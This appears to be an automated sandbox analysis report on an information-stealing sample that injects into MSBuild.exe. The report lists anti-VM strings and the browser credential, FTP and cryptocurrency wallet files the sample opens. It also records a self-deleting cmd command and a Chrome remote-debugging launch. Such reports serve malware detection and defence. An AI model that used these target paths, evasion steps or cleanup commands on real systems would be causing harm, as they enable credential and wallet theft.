Source: chrome.exe, 00000005.00000002.2638189784.000077B000A90000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=17003e26-6185-47e2-a725-b174883e6ccdw
Source: 5x47q9.3.dr Binary or memory string: global block list test formVMware20,11696428655
Source: 5x47q9.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: MSBuild.exe, 00000003.00000002.2902111510.0000000001490000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: msedge.exe, 00000009.00000003.2671573141.000041B000324000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: unins000.exe, 00000000.00000002.2404445235.0000000003A01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: 5x47q9.3.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 5x47q9.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 5x47q9.3.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 5x47q9.3.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 5x47q9.3.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 5x47q9.3.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 5x47q9.3.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 5x47q9.3.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 5x47q9.3.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: chrome.exe, 00000005.00000002.2625676453.000002B813C27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 5x47q9.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 5x47q9.3.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 5x47q9.3.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 5x47q9.3.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: chrome.exe, 00000005.00000002.2626557544.000002B81770D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
Source: 5x47q9.3.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: 5x47q9.3.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 5x47q9.3.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: chrome.exe, 00000005.00000002.2642114782.000077B0010F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mousew
Source: 5x47q9.3.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 5x47q9.3.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 5x47q9.3.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 5x47q9.3.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 5x47q9.3.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: unins000.exe, 00000000.00000002.2404445235.0000000003A01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: 5x47q9.3.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 5x47q9.3.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 5x47q9.3.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 5x47q9.3.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\unins000.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_0040E886
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03293A45 mov eax, dword ptr fs:[00000030h] 0_2_03293A45
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03293485 mov edx, dword ptr fs:[00000030h] 0_2_03293485
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03294095 mov eax, dword ptr fs:[00000030h] 0_2_03294095
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03294094 mov eax, dword ptr fs:[00000030h] 0_2_03294094
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03293DF5 mov eax, dword ptr fs:[00000030h] 0_2_03293DF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040D84A lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrcpyA,lstrcatA, 3_2_0040D84A
Source: C:\Users\user\Desktop\unins000.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: unins000.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5440, type: MEMORYSTR
Source: C:\Users\user\Desktop\unins000.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle, 3_2_0040F029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 3_2_0040F0CA
Source: C:\Users\user\Desktop\unins000.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41D000 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41F000 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 421000 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFD008 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\yct26" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 3_2_0040DE1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00417652 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 3_2_00417652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00414E31 EntryPoint,GetUserNameW,GetComputerNameW, 3_2_00414E31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040DDBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 3_2_0040DDBF
Source: C:\Users\user\Desktop\unins000.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.unins000.exe.4acf770.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: unins000.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5440, type: MEMORYSTR
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000003.00000002.2902111510.0000000001490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodus
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: unins000.exe, 00000000.00000003.2346763323.0000000004A26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: Yara match File source: 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5440, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.unins000.exe.4acf770.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: unins000.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5440, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs